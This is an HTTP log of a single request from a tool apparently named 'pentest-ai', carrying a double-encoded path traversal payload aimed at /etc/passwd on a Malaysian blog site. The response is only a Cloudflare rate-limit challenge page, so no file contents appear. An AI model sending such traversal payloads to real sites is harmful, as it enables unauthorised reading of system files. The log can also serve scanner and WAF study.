REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?page=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9983
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b577857a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=jEL%2FQK3LlFtl3Avmh7gFXbn5DQJI%2B0VtPZvJX9NSb2puHVCOfWqx%2BWY%2BAz5XG8QntegaedaU74x5zXrVIlmNNSCmIWIKoCID3KSKSnCNcLYDecpaZORud6Rk%2FBkoaUmuAgGgyl4Wtiph%2BBk%2FjQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b577857a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'WeJEYU1VC5f6ecuEdLwvarvJStps3Gnqe1gn8_iqdHc-1784280666-1.2.1.1-HsybsvBVmCMgrYkc40LXkdAz3dk7NV9ZUqoEsNOKsDnCVka8Cw1DLEGaQt2772Zn',cITimeS: '1784280666',cRay: 'a1c83b577857a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?page=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=S9wfqS91bXeIwF8KI1_bdhVR0cPcnyYrRdfGP11Z2uU-1784280666-1.0.1.1-1djFbsDCmnfVf25FH607kmFLt5969m_bpr3SaxWg3Ig",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?page=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=S9wfqS91bXeIwF8KI1_bdhVR0cPcnyYrRdfGP11Z2uU-1784280666-1.0.1.1-1djFbsDCmnfVf25FH607kmFLt5969m_bpr3SaxWg3Ig",md: 'IfHqg0TeGA0q8.c3TxzWTlnU8lYykGrW8TMbBUYdeRA-1784280666-1.2.1.1-FtVkhlYho7Vvyy1k0CG7fW4x4R.n7WC1e19Jv8_gsSsrznFKpgBEpSkSiUXBVOlbnhxakXotPiDIXdedo9Ddtd2ohyhfGYYWzLnDeLmRm5T1kV9peovFYg7Z2tx2643p9o8lHkN76_ts.1mKW1UWKEyp4qX5e9pf_d5XGa0HqhDCi8hxn13LO8SmyPyFhFeGJkB1KrYB2B0yfaTeR2RKWF8aQ4A_81TQ5weYi0rgz7VzqxgrA3rAagHIFwYcXwA7bbBHMoKMW5xZRQDfYFUO8qCf1E8lfZl1z64Jf70.hKZoc_15lPYK9p5siOKcaxEDyz9guMgHxTffNULzZb8oWtOwPom.jWDJ9sXK.qudZZJTRYbbqsCp4Lgsr9UYxM7dH1vf8EybNKv6vly.TZKO2zj9McaJ.NuFODGW15QWUn82Or9Bqr1fxQHmtyrP37sc0Fq_xFHP96BFwvP9M9k7yt21Rdk2iybuO2lO5ppTxLeoRja5exyA1CobSFAHTzLi1VZCTdyPqWFnt8Jz1nfY.xqbpsHWNpzw.CQ4_3ELf1uzHfJT5qbFgQDokD661kh0wO.JV6E8MaLehWNG3OknBTGzDYFtaIJvbz9BZAUMbeBNCxlV5.m2r1bN83v4qCvWtUaMigN81FE5i8MIPzj77dnyrerAv8rc7rv582_Xmlvd3qN6o6cs_SGMor1LV5sOZQ45triPoz7JLScuJte8IpdBkmRWpUjf7l4yCgS0LK97RYSe2lK62POi9rz1BVnwAHmjiJIIU8xQiWkffbS.Jk9Wa7PgZEo7V.u6FmqCYAk6UEUWrx5NVNh_6Y4MCbPg1r177d6sTRcFz_PoGVjVdIl9k6wSZt4w.hoZBjfZJVuwJtadNobMI9VbW6R_jOj2TH5dJulT0taJIPlCI1MsTeKLcDRJ4VgRzcahHXW1cHxIM6l8IF8ifuigmXBaYrTrDzu2vx0Hqfbldr9a3..te3uxf_UkpRF1e5Xy9Vq9rreOc8hPLuny1bB4Pz9Ro6X2PW4VBWQ.Pzi5_ZIdT1JaizEU_QwqPGCVeagyHQwbn7FbyTVierxFNRxHq60FGK0pvobh0jer6YGvJ8UFcnq.KevBSRik14EMbiEpFFMEOWlcbmuRnIsYZMvCsTk_wrLYZWjth5FJa4xAWJScC2V.KHSpqOkH7jbnR7SsJY7xQC3q6FZiS7wKVTIDdGMLeZNgTfLRtrSncUocbS5EhWjTtdSR5w0TJfuWb0Jkx0J4KyPc1gZ4O9xu.4I0ueQN6ZbkiAs3v55eDbfMMZuTpqcNl6kpPphNXYw9wCmLWgMKBDNx5nnw_zjfpzk7jFa7w0QyvGrKMW4FWcw5bZULHIJH8XNICdaP_U5Up_zCH.lyhO2LNXSbPmi_6yuB1oJ.S2VR',mdrd: 'VbHhlv2X4I9b8DmxSrg6aYZPLkWZyzuponmWWGIfF78-1784280666-1.2.1.1-AITQEwWs5kku1hLq9H4R6RYa21LNLkxodrhxxuLEFkWLUsJEPapsatmIV4EBfH9bIyHcluXm7bhMWUk6w8.a0BkNWqUCuch2J9Rp7zAwgXVTqJYSMZtS5sfQmM4l_.SpWiHM01p9v82pUdq9BrseZNTXsGtNWgDRGWXrr9YLzGYqrTu0zYlharSpo44MnHadBor88vo_7gI6qZlbuCoD69VI2EIRh5wxr7V67EhYswZxN2iiOMuMxnJfxZ.xVaXJ',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b577857a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?page=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=S9wfqS91bXeIwF8KI1_bdhVR0cPcnyYrRdfGP11Z2uU-1784280666-1.0.1.1-1djFbsDCmnfVf25FH607kmFLt5969m_bpr3SaxWg3Ig"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
